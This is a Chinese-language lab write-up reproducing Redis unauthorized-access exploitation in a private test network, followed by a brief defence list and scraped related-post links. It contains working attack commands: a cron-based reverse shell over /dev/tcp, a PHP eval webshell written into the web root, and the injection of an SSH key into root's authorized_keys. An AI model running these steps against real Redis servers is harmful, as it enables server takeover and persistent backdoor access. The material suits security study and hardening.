redis未授权访问漏洞——简单记录
从0复现redis未授权访问漏洞
环境:centos8(ip:10.0.0.3) 安装 redis
工具:kali(10.1.1.136)
1. 介绍
Redis
REmote DIctionary Server(Redis) 是完全开源免费的,遵守BSD协议,Redis是一个由Salvatore Sanfilippo写的key-value存储系统。。
Redis 与其他它key - value 缓存产品有以下三个特点:
- Redis支持数据的持久化,可以将内存中的数据保存在磁盘中,重启的时候可以再次加载进行使用。
- Redis不仅仅支持简单的key-value类型的数据,同时还提供list,set,zset,hash等数据结构的存储。
- Redis支持数据的备份,即master-slave模式的数据备份。
Redis因配置不当可造成未授权访问。攻击者无需通过身份认证便可访问到内部数据,造成敏感信息泄露,也可以恶意执行flushall来清空所有数据。如果Redis以root身份运行,可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。
2. 环境准备
kali作为攻击端。centos作为靶机~
安装redis
(建议用centos,之前用的vulhub中的redis未授权访问镜像,后面的操作都不行。别问为什么可以,也别问为什么不行,因为我是真滴不知道呀。只是跟着复现罢了,还真不知道原理。)
kali和centos都需要安装;
配置redis远程访问
如下图设置:
- 注释掉
bind 127.0.0.1
proteced-mode
改为no
daemonize
改为no
requirepass
随便设置
这个是连接时使用的密码。注释掉了就不用输入密码验证,如果不注释,就需要密码验证;
为了方便演示,尽量一次过关,我这里将密码设置为123456
(即:去掉注释)
- 关闭centos防火墙
systemctl stop firewalld.service
,重启系统后会开启防火墙;
所以可以考虑一下禁用防火墙,systemctl disable firewalld.service
感觉基本就搞完了。
测试远程访问:
centos开启redis服务:
进入:/usr/local/redis/bin
,执行命令:./redis-server redis.conf
这个就因人而异。
至于为啥是前台启动(会显示页面),我也不知道为啥。这个环境配了从昨天配置到今天(能踩的坑都踩了一遍),能跑就已经谢天谢地了。
kali上进行连接:
或者也可以:
-p 6379
可写可不写。指定端口嘛,默认端口是6379。
前面全是搭建环境的步骤,可以跟着上述方法来试试。毕竟环境配置出问题,真的劝退。下面就是正常步骤了。
3. 漏洞复现
1. 反弹shell(复现失败)
kali:检测目标端口是否开放:nmap -A -p 6379 -script redis-info 10.0.0.3
向目标写入任务计划,反弹shell
10.0.0.3:6379> set x "\n* * * * * bash -i >& /dev/tcp/10.1.1.136/888 0>&1\n"
10.0.0.3:6379> config set dir /var/spool/cron/
10.0.0.3:6379> config set dbfilename root
10.0.0.3:6379> save
kali侦听888端口
麻了,没反弹出来。但是从centos的redis前端可以看到已经保存到了磁盘;
找了一下其他的复现博客,有一个提到了要等一段时间,这个一段时间就不知道多久了。
麻了,过了很久,那就是复现不成功了。
唔不知道是不是因为版本问题。。。
2. 写入webshell(复现成功)
假如权限不高,可以考虑写入webshell(人麻了,才装的centos没装apache,php...)
指定目录的时候,目录要存在才不会报错,否则会报错
config set dir /var/www/html 设置web目录
config set dbfilename webshell.php 设置备份文件名
set shell "<?php @eval($_POST['shell']);?>" 设置值
最好是写入:
set shell "\r\n\r\n<?php @eval($_POST['shell']);?>\r\n\r\n"
save 保存
可以看到这里已经有了webshell.php
尝试访问和执行
3. ssh-keygen公钥然后使用私钥登陆
跟着下面的步骤走就行
kali进入:/root/.ssh目录
# ssh-keygen -t rsa 啥都不写,直接回车
# (echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n")>1.txt
# cp 1.txt /root/redis-4.0.11/src/
kali进入:/root/redis-4.0.11/src/目录下
# cat 1.txt | ./redis-cli -h 10.0.0.3 -a 123456 -x set crack
# ./redis-cli -h 10.0.0.3 -a 123456
> config set dir /root/.ssh
> config set dbfilename authorized_keys
> save
# ssh -i id_rsa root@10.0.0.3
4.防御方法
测试远程访问的修改方法反着走;
- 设置密码
- 设置访问ip
- 开启防火墙
- 修改服务端口..等等
参考
redis未授权访问漏洞——简单记录的更多相关文章
- Redis未授权访问漏洞的利用及防护
Redis未授权访问漏洞的利用及防护 什么是Redis未授权访问漏洞? Redis在默认情况下,会绑定在0.0.0.0:6379.如果没有采取相关的安全策略,比如添加防火墙规则.避免其他非信任来源IP ...
- 10.Redis未授权访问漏洞复现与利用
一.漏洞简介以及危害: 1.什么是redis未授权访问漏洞: Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等 ...
- 浅谈Redis未授权访问漏洞
Redis未授权访问漏洞 Redis是一种key-value键值对的非关系型数据库 默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问等 ...
- 利用redis未授权访问漏洞(windows版)
0x00 原理 首先需要知道的是,redis是一种非关系型数据库.它在默认情况下,绑定在0.0.0.0:6379 ,若不采取相关策略,比如添加防火墙限制非信任IP访问,会使得redis服务暴露到公 ...
- [ Redis ] Redis 未授权访问漏洞被利用,服务器登陆不上
一.缘由: 突然有一天某台服务器远程登陆不上,试了好几个人的账号都行,顿时慌了,感觉服务器被黑.在终于找到一个还在登陆状态的同事后,经查看/ect/passwd 和/etc/passwd-异常,文件中 ...
- Redis 未授权访问漏洞(附Python脚本)
0x01 环境搭建 #下载并安装 cd /tmp wget http://download.redis.io/releases/redis-2.8.17.tar.gz tar xzf redis-.t ...
- docker搭建redis未授权访问漏洞环境
这是redis未授权访问漏洞环境,可以使用该环境练习重置/etc/passwd文件从而重置root密码 环境我已经搭好放在了docker hub 可以使用命令docker search ju5ton1 ...
- redis未授权访问漏洞那拿SHELL
一.什么是redis未授权访问漏洞: 1.redis是一种文档型数据库,快速高效,存储在内存中,定期才会写磁盘.主要用于快速缓存,数据转存处理等.默认redis开在6379端口,可以直接访问.并不需要 ...
- Redis未授权访问漏洞复现
Redis未授权访问漏洞复现 一.漏洞描述 Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没 ...
- [转帖]Redis未授权访问漏洞复现
Redis未授权访问漏洞复现 https://www.cnblogs.com/yuzly/p/11663822.html config set dirconfig set dbfile xxxx 一. ...
随机推荐
- 7. PyQt5 中的多线程的使用(下)
专栏地址 ʅ(‾◡◝)ʃ 紧接着上一节, 这一节具体介绍 图形化界面 如何给 任务线程传递数据 7.1 from form import Ui_Form from PyQt5.QtWidgets im ...
- 【Java SE进阶】Day08 File类、递归
一.File类 1.概述java.io.File 文件和路径的抽象表示 用于文件和目录的创建.查找和删除等 分类 file--文件 directory--文件夹/目录 path--路径 2.静态成员变 ...
- 【每日一题】【回溯】【StringBuilder】2021年12月7日-17. 电话号码的字母组合
给定一个仅包含数字 2-9 的字符串,返回所有它能表示的字母组合.答案可以按 任意顺序 返回. 给出数字到字母的映射如下(与电话按键相同).注意 1 不对应任何字母. 来源:力扣(LeetCode)链 ...
- 【Java】二分查找标准代码
太菜了..写不出正确的... 干脆放一个标准代码,之后参考 boolean BinarySearch(int[] m){ int l=0,r=m.length-1;//减1相当于数组两头(lr都能指到 ...
- 在微信上搭建ChatGpt机器人
在微信上搭建ChatGpt机器人 项目地址:https://gitee.com/shtml/wechatbot?_from=gitee_search 准备 一个服务器:Windos,Centos,Ub ...
- 02.JavaScript学习笔记1
1.强制类型转换 当使用加号进行运算时,会将数字强制转换为字符串,然后再进行运算. const year = '1991'; console.log(year + 18); console.log(t ...
- python操作MySQL数据库连接(pymysql)
目录 一:python操作MySQL 1.python如何操作MySQL? 2.什么是 PyMySQL? 二:PyMySQL 安装 1.方法一: 2.方法二: 三:pyMySQL模块基本使用 1.py ...
- RabbitMQ、RocketMQ、Kafka延迟队列实现
延迟队列在实际项目中有非常多的应用场景,最常见的比如订单未支付,超时取消订单,在创建订单的时候发送一条延迟消息,达到延迟时间之后消费者收到消息,如果订单没有支付的话,那么就取消订单. 那么,今天我们需 ...
- JavaScript:原型(prototype)
面向对象有一个特征是继承,即重用某个已有类的代码,在其基础上建立新的类,而无需重新编写对应的属性和方法,继承之后拿来即用: 在其他的面向对象编程语言比如Java中,通常是指,子类继承父类的属性和方法: ...
- 《STL源码剖析》STL的双层配置器
SGI STL第一级配置器: template<int inst> class __malloc_alloc_template{...}; 其中: 1.allocate()直接使用mall ...